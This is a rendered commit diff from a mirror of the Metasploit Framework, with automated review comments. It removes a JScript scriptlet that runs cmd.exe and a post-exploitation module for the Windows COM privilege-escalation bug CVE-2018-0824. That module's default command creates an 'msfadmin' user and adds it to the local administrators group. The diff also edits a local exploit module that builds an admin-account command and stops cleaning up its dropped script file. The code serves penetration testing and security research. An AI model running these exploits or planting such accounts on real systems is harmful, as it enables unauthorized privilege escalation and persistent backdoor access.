mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-07-18 18:31:41 +02:00
Remove duplicated files
parent
47353553e5
commit
927a29530b
@ -1,5 +0,0 @@
|
||||
");
|
||||
]]>
|
||||
</script>
|
||||
</component>
|
||||
</package>
|
@ -1,13 +0,0 @@
|
||||
<?xml version='1.0'?>
|
||||
<package>
|
||||
<component id='giffile'>
|
||||
<registration
|
||||
description='Dummy'
|
||||
progid='giffile'
|
||||
version='1.00'
|
||||
remotable='True'>
|
||||
</registration>
|
||||
<script language='JScript'>
|
||||
<![CDATA[
|
||||
var oShell = new ActiveXObject('Wscript.Shell');
|
||||
oShell.Run("cmd.exe
|
File diff suppressed because one or more lines are too long
@ -1,134 +0,0 @@
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Registry
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Windows unmarshal post exploitation',
|
||||
'Description' => %q{
|
||||
This module exploits a local privilege escalation bug which exists
|
||||
in microsoft COM for windows when it fails to properly handle serialized objects.},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2018-0824'],
|
||||
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824'],
|
||||
['URL', 'https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn'],
|
||||
['EDB', '44906']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Nicolas Joly', # Vulnerability discovery
|
||||
'Matthias Kaiser', # Exploit PoC
|
||||
'Sanjay Gondaliya', # Modified PoC
|
||||
'Pratik Shah <pratik@notsosecure.com>' # Metasploit module
|
||||
],
|
||||
'DisclosureDate' => 'Aug 05 2018',
|
||||
'Arch' => [ARCH_X64],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('POCCMD', [true, 'The command to run from poc.sct', '/k net user msfadmin P@ssw0rd /add && net localgroup administrators msfadmin /add']),
|
||||
OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ])
|
||||
])
|
||||
end
|
||||
|
||||
def write_poc_to_target(rpoc, rpocname)
|
||||
begin
|
||||
print_warning("writing to %TEMP%")
|
||||
temppoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
write_sct_to_target(temppoc,rpoc)
|
||||
end
|
||||
|
||||
print_good("Persistent Script written to #{temppoc}")
|
||||
temppoc
|
||||
end
|
||||
|
||||
def write_sct_to_target(temppoc,rpoc)
|
||||
fd = session.fs.file.new(temppoc, "w")
|
||||
fd.write(rpoc)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def app_poc_on_target(append,rpocname)
|
||||
appendpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
fd = session.fs.file.new(appendpoc, "a")
|
||||
fd.write(append)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def create_sct_file(txt)
|
||||
print_status("Reading Payload from file #{txt}")
|
||||
::IO.read(txt)
|
||||
end
|
||||
|
||||
def write_exe_to_target(rexe, rexename)
|
||||
begin
|
||||
print_warning("writing to %TEMP%")
|
||||
temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
|
||||
write_file_to_target(temprexe,rexe)
|
||||
end
|
||||
print_good("Persistent Script written to #{temprexe}")
|
||||
temprexe
|
||||
end
|
||||
|
||||
def write_file_to_target(temprexe,rexe)
|
||||
fd = session.fs.file.new(temprexe, "wb")
|
||||
fd.write(rexe)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def create_payload_from_file(exec)
|
||||
print_status("Reading Payload from file #{exec}")
|
||||
::IO.read(exec)
|
||||
end
|
||||
|
||||
def run
|
||||
rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe"
|
||||
print_status("exe name is: #{rexename}")
|
||||
rpocname = Rex::Text.rand_text_alphanumeric(10) + ".sct"
|
||||
print_status("poc name is: #{rpocname}")
|
||||
poccmd = datastore['POCCMD']
|
||||
cmdcheck = datastore['CMDCHECK']
|
||||
|
||||
rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
|
||||
raw = create_payload_from_file rexe
|
||||
script_on_target = write_exe_to_target(raw, rexename)
|
||||
rpoc = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_header')
|
||||
rawsct = create_sct_file rpoc
|
||||
poc_on_target = write_poc_to_target(rawsct, rpocname)
|
||||
|
||||
cmdpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
fd = session.fs.file.new(cmdpoc, "a")
|
||||
fd.write(poccmd)
|
||||
fd.close
|
||||
|
||||
rpoc1 = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_footer')
|
||||
append = create_payload_from_file rpoc1
|
||||
append_on_target = app_poc_on_target(append, rpocname)
|
||||
|
||||
print_status('Starting module...')
|
||||
print_line('')
|
||||
|
||||
command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
|
||||
print_status("Location of UnmarshalPwn.exe is: #{command}")
|
||||
command1 = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
print_status("Location of poc.sct is: #{command1}")
|
||||
|
||||
command += " "
|
||||
command += "#{command1}"
|
||||
|
||||
print_status("Executing command : #{command}")
|
||||
command_output = cmd_exec(command)
|
||||
print_line(command_output)
|
||||
print_line('')
|
||||
|
||||
end
|
||||
end
|
@ -73,7 +73,9 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
password = Rex::Text.rand_text_alpha((rand(8) + 6))
|
||||
print_status("username = #{username}, password = #{password}")
|
||||
cmd_to_run = 'net user /add ' + username + ' ' + password
|
||||
cmd_to_run += ' > C:\\\\Windows\\\\Temp\\\\testoutput.txt'
|
||||
cmd_to_run += ' & net localgroup administrators /add ' + username
|
||||
cmd_to_run += ' >> C:\\\\Windows\\\\Temp\\\\testoutput.txt'
|
||||
print_status(cmd_to_run)
|
||||
return cmd_to_run
|
||||
end
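Review bot: The redirects to `C:\\\\Windows\\\\Temp\\\\testoutput.txt` on the two `cmd_to_run +=` lines look like leftover debugging: the file name is hard-coded, nothing visible in this hunk removes the file, and the commit title ("Remove duplicated files") does not mention a behaviour change. If the redirect is intentional, it needs a comment such as `# net.exe output is captured in testoutput.txt for troubleshooting; the file stays on the host`, and the module documentation should list that file among the artifacts to remove after an authorised test. The rendering lost the +/- markers, so which of these lines are new is only inferred from the 7 → 9 line counts. The enclosing method begins outside the hunk.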
|
||||
@ -127,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
script_template_data = ::IO.read(local_script_template_path)
|
||||
vprint_status("script_template_data.length = #{script_template_data.length}")
|
||||
full_command = 'cmd.exe /c ' + cmd_to_run
|
||||
full_command = cmd_to_run
|
||||
script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
|
||||
if script_data == nil
|
||||
fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
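Review bot: `full_command = 'cmd.exe /c ' + cmd_to_run` is dead code, because the next line overwrites it with `full_command = cmd_to_run` before the value is read. Keep a single assignment and record why the prefix is absent, e.g. `# no 'cmd.exe /c' prefix: <reason>`, so the next reader does not restore it by accident. `if script_data == nil` would also read better as `if script_data.nil?`. The `if` block continues past the end of the hunk.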
|
||||
@ -158,13 +161,13 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
vprint_status(command_output)
|
||||
print_good('Exploit completed, wait for elevated session')
|
||||
ensure_clean_destination(exploit_path)
|
||||
ensure_clean_destination(script_path)
|
||||
# ensure_clean_destination(script_path)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_good('Command failed, cleaning up')
|
||||
print_error(e.message)
|
||||
ensure_clean_destination(exploit_path)
|
||||
ensure_clean_destination(script_path)
|
||||
# ensure_clean_destination(script_path)
|
||||
end
|
||||
end
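Review bot: A commented-out `# ensure_clean_destination(script_path)` sits beside the live call in both the success path and the `rescue` branch. Going by print order the new code disables removal of the script file, although the +/- markers are lost in this rendering. Commented-out code without an explanation should not be committed: either keep the call, or delete the line and add a comment saying why the script is left on the host, so whoever runs the module knows an artifact remains to be removed. In the `rescue` branch, `print_good('Command failed, cleaning up')` reports a failure through the success printer; `print_error('Command failed, cleaning up')` matches the line after it. The method starts outside the hunk.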
|
||||
|
||||
|